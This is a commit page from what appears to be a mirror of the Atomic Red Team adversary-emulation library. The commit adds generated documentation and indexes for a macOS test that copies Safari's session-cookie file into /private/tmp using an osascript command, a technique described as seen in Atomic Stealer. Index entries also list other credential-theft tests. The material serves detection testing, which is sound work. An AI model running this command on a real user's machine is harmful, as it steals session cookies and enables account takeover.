security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2025-02-06 19:16:33 +00:00
parent b34f3d50ff
commit 8eda90a87c
12 changed files with 92 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+1 -1
View File
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1709-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1710-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1539,6 +1539,7 @@ credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Window
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1539 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
1540 credential-access T1539 Steal Web Session Cookie 3 Steal Chrome Cookies via Remote Debugging (Mac) e43cfdaf-3fb8-4a45-8de0-7eee8741d072 bash
1541 credential-access T1539 Steal Web Session Cookie 4 Steal Chrome v127+ cookies via Remote Debugging (Windows) b647f4ee-88de-40ac-9419-f17fac9489a7 powershell
1542 credential-access T1539 Steal Web Session Cookie 5 Copy Safari BinaryCookies files using AppleScript e57ba07b-3a33-40cd-a892-748273b9b49a sh
1543 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
1544 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
1545 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
atomics/Indexes/Indexes-CSV/macos-index.csv
+1
View File
@@ -190,6 +190,7 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root acco
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
190 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
191 credential-access T1056.001 Input Capture: Keylogging 8 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
192 credential-access T1539 Steal Web Session Cookie 3 Steal Chrome Cookies via Remote Debugging (Mac) e43cfdaf-3fb8-4a45-8de0-7eee8741d072 bash
193 credential-access T1539 Steal Web Session Cookie 5 Copy Safari BinaryCookies files using AppleScript e57ba07b-3a33-40cd-a892-748273b9b49a sh
194 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain Dump 88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6 sh
195 credential-access T1555.001 Credentials from Password Stores: Keychain 2 Export Certificate Item(s) 1864fdec-ff86-4452-8c30-f12507582a93 sh
196 credential-access T1555.001 Credentials from Password Stores: Keychain 3 Import Certificate Item(s) into Keychain e544bbcb-c4e0-4bd0-b614-b92131635f59 sh
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -2136,6 +2136,7 @@
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
atomics/Indexes/Indexes-Markdown/macos-index.md
+1
View File
@@ -554,6 +554,7 @@
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/index.yaml
+22
View File
@@ -90100,6 +90100,28 @@ credential-access:
Stop-Process $chromeProcess -Force
name: powershell
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: 'This command will copy Safari BinaryCookies files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the BinaryCookies file into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
destinationFolderPath with replacing' -e 'end tell'
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
name: sh
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
atomics/Indexes/macos-index.yaml
+22
View File
@@ -49505,6 +49505,28 @@ credential-access:
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
name: bash
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: 'This command will copy Safari BinaryCookies files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the BinaryCookies file into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
destinationFolderPath with replacing' -e 'end tell'
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
name: sh
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
atomics/T1539/T1539.md
+39
View File
@@ -20,6 +20,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session
- [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)
- [Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript](#atomic-test-5---copy-safari-binarycookies-files-using-applescript)
<br/>
@@ -261,4 +263,41 @@ Stop-Process $chromeProcess -Force
<br/>
<br/>
## Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
**Supported Platforms:** macOS
**auto_generated_guid:** e57ba07b-3a33-40cd-a892-748273b9b49a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Specify the path to copy the BinaryCookies file into. | path | /private/tmp|
#### Attack Commands: Run with `sh`!
```sh
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
```
#### Cleanup Commands:
```sh
rm "#{destination_path}/Cookies.binarycookies"
```
<br/>
atomics/T1539/T1539.yaml
+1
View File
@@ -161,6 +161,7 @@ atomic_tests:
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: |
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
supported_platforms:
atomics/used_guids.txt
+1
View File
@@ -1733,3 +1733,4 @@ a3cc9c95-c160-4b86-af6f-84fba87bfd30
e04d2e89-de15-4d90-92f9-a335c7337f0f
87a4a141-c2bb-49d1-a604-8679082d8b91
5c32102a-c508-49d3-978f-288f8a9f6617
e57ba07b-3a33-40cd-a892-748273b9b49a